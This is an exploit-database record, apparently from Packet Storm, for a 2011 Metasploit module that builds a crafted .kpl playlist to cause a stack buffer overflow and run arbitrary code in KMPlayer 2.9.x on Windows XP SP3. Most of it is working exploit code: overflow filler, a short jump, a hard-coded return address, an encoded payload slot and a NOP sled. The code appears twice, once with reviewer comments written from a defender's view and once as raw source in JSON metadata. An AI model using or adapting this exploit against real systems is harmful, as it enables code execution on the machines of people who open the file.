ID PACKETSTORM:100687
Type packetstorm
Reporter KedAns-Dz
Modified 2011-04-22T00:00:00
Description
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# KMPlayer <=2.9.x (.kpl) Stack Buffer Overflow (meta)
# By KedAns-Dz
# $ kmp_sbof.rb | 21/04/2011 13:30 $
# Windows XP Sp3 Fr
require 'msf/core'
# Metasploit file-format module: writes a .kpl playlist whose "File1=" entry
# overruns a stack buffer in KMPlayer (the header above says <= 2.9.x, the
# description below says v2.9.3). Nothing in this class touches the network;
# the only side effect is the file_create call at the end of #exploit, so from
# a defender's view the exposure is "a user opens an untrusted .kpl file".
# NOTE(review): Msf::Exploit::Remote is presumably just the framework's base
# class convention for FILEFORMAT modules — there is no remote I/O here.
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

# FILEFORMAT supplies the FILENAME option plumbing and file_create.
include Msf::Exploit::FILEFORMAT

# Registers module metadata and the single FILENAME option; no other state is
# set up here.
def initialize(info = {})
super(update_info(info,
'Name' => 'KMPlayer 2.9.x (.kpl) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions v2.9.3
creating a specially crafted .kpl file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'KedAns-Dz <ked-h[at]hotmail.com>',
'Version' => 'Version 1',
# NOTE(review): the only reference is a placeholder string rather than a URL,
# and the surrounding record lists no CVE, so anyone triaging this has just
# the module text to go on.
'References' =>
[
[ 'URL', 'Not Detected Olden This' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
# 1900 bytes is the room reserved for the encoded payload in #exploit. The
# four BadChars are NUL plus space/LF/CR — presumably the delimiters a
# line-oriented playlist parser would stop on (inferred, not stated here).
'Space' => 1900,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
# NOTE(review): 'True' is a String, not the boolean true. It is truthy in
# Ruby, but confirm how the framework interprets this option value.
'DisableNops' => 'True',
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ESI',
}
},
'Platform' => 'win',
# A single hard-coded return address for one OS build and locale; the trailing
# comment is the only provenance for the value. A fixed address implies the
# module assumes no address randomization on that target — TODO confirm.
'Targets' =>
[
[ 'Windows XP SP3 France', { 'Ret' => 0x0247fff4} ], # CALL from ntdll.dll
],
'Privileged' => false,
'DefaultTarget' => 0))

# FILENAME is optional (required flag false) and defaults to 'KedAns.kpl'.
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'KedAns.kpl']),
], self.class)
end

# Builds the playlist text and writes it to FILENAME. The body is a fixed byte
# layout — each segment length below is part of the overflow — which is why
# the pieces are appended in exactly this order and nothing is reordered.
# Detection note: a legitimate File1= value is a path or URL; this one is
# roughly 2.7 KB (13 + 200 + 4 + 30 + 4 + up to 1900 + 543 + 4 bytes) of
# mostly 0x41 / 0x90 filler and alphanumeric-encoded payload.
def exploit
sploit = "[playlist]\n"
sploit << "NumberOfEntries=1\n"
sploit << "File1=http://"
sploit << "\x41" * 200 # buffer Junk
sploit << "\xeb\x06\x90\x90" # short jump
sploit << "\x90" * 30 # nop
sploit << [target.ret].pack('V') # the selected target's Ret as a little-endian 32-bit value
sploit << payload.encoded # at most 'Space' (1900) bytes, per the Payload options above
sploit << "\x90" * 543 # nop sled
sploit << ".mp3"
# `ked` is the same String object as `sploit`, not a copy.
ked = sploit
# NOTE(review): file_create is assumed to take its output path from
# datastore['FILENAME'], matching the status message — verify in the mixin.
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(ked)
end
end`
{"id": "PACKETSTORM:100687", "type": "packetstorm", "bulletinFamily": "exploit", "title": "KMPlayer 2.9.x (.kpl) Stack Buffer Overflow", "description": "", "published": "2011-04-22T00:00:00", "modified": "2011-04-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/100687/KMPlayer-2.9.x-.kpl-Stack-Buffer-Overflow.html", "reporter": "KedAns-Dz", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:39", "viewCount": 3, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2016-11-03T10:16:39", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:39", "rev": 2}, "vulnersScore": 1.1}, "sourceHref": "https://packetstormsecurity.com/files/download/100687/kmp_sbof.rb.txt", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 
1 \n1 1 \n0 [+] Site : 1337day.com 0 \n1 [+] Support e-mail : submit[at]1337day.com 1 \n0 0 \n1 ######################################### 1 \n0 I'm KedAns-Dz member from Inj3ct0r Team 1 \n1 ######################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n# KMPlayer <=2.9.x (.kpl) Stack Buffer Overflow (meta) \n# By KedAns-Dz \n# $ kmp_sbof.rb | 21/04/2011 13:30 $ \n# Windows XP Sp3 Fr \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'KMPlayer 2.9.x (.kpl) Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in versions v2.9.3 \ncreating a specially crafted .kpl file, an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => 'KedAns-Dz <ked-h[at]hotmail.com>', \n'Version' => 'Version 1', \n'References' => \n[ \n[ 'URL', 'Not Detected Olden This' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1900, \n'BadChars' => \"\\x00\\x20\\x0a\\x0d\", \n'StackAdjustment' => -3500, \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumMixed, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ESI', \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3 France', { 'Ret' => 0x0247fff4} ], # CALL from ntdll.dll \n \n], \n'Privileged' => false, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'KedAns.kpl']), \n], self.class) \nend \n \n \ndef exploit \n \nsploit = \"[playlist]\\n\" \nsploit << \"NumberOfEntries=1\\n\" \nsploit << \"File1=http://\" \nsploit << \"\\x41\" * 200 # buffer Junk \nsploit << \"\\xeb\\x06\\x90\\x90\" # short jump \nsploit << \"\\x90\" * 30 # nop \nsploit << [target.ret].pack('V') \nsploit << payload.encoded \nsploit << \"\\x90\" * 543 
# nop sled \nsploit << \".mp3\" \nked = sploit \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(ked) \n \nend \n \nend`\n"}
{}